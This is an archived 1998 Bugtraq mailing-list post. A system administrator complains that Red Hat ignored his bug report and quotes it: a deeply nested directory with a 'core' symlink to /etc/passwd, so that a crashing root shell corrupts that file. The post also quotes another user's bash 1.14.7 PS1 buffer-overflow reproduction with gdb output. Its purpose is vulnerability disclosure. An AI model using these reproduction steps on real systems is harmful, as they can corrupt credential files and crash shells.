ummm....I notified Redhat back on April 3 about this bug. It seems that they weren't too interested back then in doing anything about...and it looks like they aren't too interested now in giving credit where credit is due. <copy of original message> Date: Fri, 3 Apr 1998 09:56:13 -0500 (EST) From: Fiji <jfayat_private> To: bugsat_private Subject: found a bug. Well it looks like if you cd into /proc/self/root/proc/self/root...692 characters later.../proc/self/root it will core. So what happens if I create a directory structure that is huge... i.e. ~fiji/ggggggggggggggggggggggggggggggggggggggggggggggggggggggg ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg ggggggggggggggggggggggggggggggggggggggggg/ggg and so forth. now at the bottom of this sturcture let's do the following: ln -s /etc/passwd ~fiji/g*/g*/g*/g*/g*/g* core now if root for whatever reason decides to cd into this...then the shell will die and core which will follow the symlink and corrupt /etc/passwd. Thought you all might like to know...so why exactly do cores follow symlinks? -Fiji CIT Stetson University Unix System Administrator </copy or original message> -Fiji On Fri, 4 Sep 1998, Joao Manuel Carolino wrote: > Date: Fri, 4 Sep 1998 16:09:28 +0000 > From: Joao Manuel Carolino <rootat_private> > To: BUGTRAQat_private > Subject: Buffer overflow in bash 1.14.7(1) > > If you cd in to a directory which has a path name larger than 1024 bytes > and you have '\w' included in your PS1 environment variable (which makes > the path to the current working directory appear in each command line > prompt), a buffer overflow will occur. > The following was tested on my machine, running Slackware 3.5: > > einstein:~# gdb bash > [...] > (gdb) r > Starting program: /bin/bash > bash# PS1='\w ' > ~ cd /tmp > /tmp mkdir `perl -e 'print "A" x 255'` > /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` > /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl > -e 'print "A" x 255'` > /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl > -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` > /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl > -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x > 255'` > /tmp cd > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ > (no debugging symbols found)...(no debugging symbols found)... > Program received signal SIGSEGV, Segmentation fault. > 0x804ed72 in sigprocmask () > (gdb) backtrace > #0 0x804ed72 in sigprocmask () > #1 0xe9 in ?? () > #2 0x41414141 in ?? () > Cannot access memory at address 0x41414141. > > Regards, > Joao >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:15:45 PDT